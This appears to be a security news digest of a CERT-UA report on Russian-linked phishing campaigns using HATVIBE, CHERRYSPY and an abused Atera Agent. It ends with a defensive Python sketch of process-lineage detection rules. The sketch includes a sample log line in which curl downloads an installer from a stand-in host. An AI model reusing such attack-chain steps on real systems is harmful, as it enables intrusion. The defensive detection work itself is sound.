Ukrainian Institutions Targeted Using HATVIBE and CHERRYSPY Malware

July 23, 2024 at 06:28AM

CERT-UA warned of a cyber espionage campaign targeting a Ukrainian scientific research institution with the HATVIBE and CHERRYSPY malware. The attackers used a compromised email account to distribute macro-laced Microsoft Word attachments; enabling the macros leads to execution of the malware. CERT-UA attributes the activity to UAC-0063, a cluster it links to the Russian GRU-associated group APT28, and separately reported a phishing campaign against Ukrainian defense enterprises.

Key takeaways from the article:

– The Computer Emergency Response Team of Ukraine (CERT-UA) has reported a spear-phishing campaign targeting a scientific research institution in Ukraine with malware known as HATVIBE and CHERRYSPY. The activity is attributed to the threat cluster UAC-0063, which CERT-UA links to APT28, a group associated with Russia's GRU.
– The attack uses compromised email accounts to send phishing messages with macro-laced Microsoft Word attachments. The macros execute an encoded HTML Application (HTA) named HATVIBE, which in turn installs the Python backdoor CHERRYSPY, giving the operators remote command execution on the host.
– CERT-UA has also detailed a separate phishing campaign against Ukrainian defense enterprises using booby-trapped PDF files. Each PDF embeds a link that, when clicked, downloads an executable (tracked as GLUEEGG), which runs a Lua-based loader called DROPCLUE; DROPCLUE then uses the curl utility to download Atera Agent, a legitimate remote monitoring and management (RMM) tool that the attackers abuse for remote access.
– Both chains rely on known security weaknesses rather than novel exploits: macro execution from emailed documents, trusted-looking mail from compromised accounts, and abuse of legitimate remote-management software. Proactive defenses follow directly: block or sign-gate Office macros arriving by email, restrict script hosts such as mshta.exe, and alert on RMM agents installed outside change control.
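As an added example (not code from CERT-UA or the article), the following Python sketch turns the two infection chains above into process-lineage detection rules and runs them over constructed process-creation records. The record format, the image names, the assumption that the HTA launches the Python interpreter directly, and the Atera installer name markers are all assumptions made for illustration; the page publishes no file names, hashes or URLs.

```python
# Added example (not CERT-UA's or the article's code): behavioural detection
# for the two process chains summarised above, run over constructed log lines.
# Log format, image names and the Atera installer markers are this example's
# assumptions; the page publishes no file names, hashes or URLs.
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # parent process image name, lower-cased (e.g. winword.exe)
    image: str     # child process image name, lower-cased (e.g. mshta.exe)
    cmdline: str   # child's full command line, as logged


# Chain 1 (HATVIBE/CHERRYSPY): Office macro -> script host running the HTA -> Python backdoor.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Chain 2 (GLUEEGG/DROPCLUE): loader -> curl fetching the Atera Agent installer.
# Marker strings are assumed for the example, not published indicators.
RMM_MARKERS = ("atera", "ateraagent")


def parse_line(line: str) -> ProcEvent:
    """Parse one 'parent_image|image|command_line' record (format assumed here)."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip().lower(), image.strip().lower(), cmdline.strip())


def office_to_script_host(e: ProcEvent) -> bool:
    """Macro-laced document handing off to a script host (HATVIBE is an HTA run by mshta.exe)."""
    return e.parent in OFFICE_APPS and e.image in SCRIPT_HOSTS


def script_host_to_python(e: ProcEvent) -> bool:
    """Script host starting a Python interpreter (CHERRYSPY is a Python backdoor).
    Assumes the HTA launches the interpreter directly; the article does not state the parent."""
    return e.parent in SCRIPT_HOSTS and e.image.startswith("python")


def curl_fetches_rmm(e: ProcEvent) -> bool:
    """curl pulling a remote-management installer, as DROPCLUE does for Atera Agent."""
    return e.image == "curl.exe" and any(m in e.cmdline.lower() for m in RMM_MARKERS)


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "office_to_script_host": office_to_script_host,
    "script_host_to_python": script_host_to_python,
    "curl_fetches_rmm": curl_fetches_rmm,
}


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, rule name) for every rule each record trips."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(lines, start=1):
        event = parse_line(line)
        hits.extend((n, name) for name, rule in RULES.items() if rule(event))
    return hits


# Constructed sample telemetry: lines 2, 3 and 5 mimic the two chains; the rest are benign.
SAMPLE_LOG = [
    r"explorer.exe|winword.exe|WINWORD.EXE /n C:\Users\u\Downloads\invite.docm",
    r"winword.exe|mshta.exe|mshta.exe C:\Users\u\AppData\Local\Temp\report.hta",
    r"mshta.exe|python.exe|python.exe C:\Users\u\AppData\Roaming\updater.py",
    r"explorer.exe|chrome.exe|chrome.exe --profile-directory=Default",
    r"setup.exe|curl.exe|curl.exe -s -o C:\Users\u\AppData\Local\Temp\AteraAgent.msi https://example.invalid/a",
    r"cmd.exe|curl.exe|curl.exe -sS https://example.invalid/updates.json",
]

if __name__ == "__main__":
    for n, name in scan(SAMPLE_LOG):
        print(f"line {n}: {name}")
```

Lineage rules like these trade precision for coverage: legitimate Office automation can spawn script hosts, and an administrator may well install Atera with curl. In practice they are tuned per environment and correlated with the delivery context the article describes (an attachment that arrived by email from an external or recently compromised mailbox) before they page anyone.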
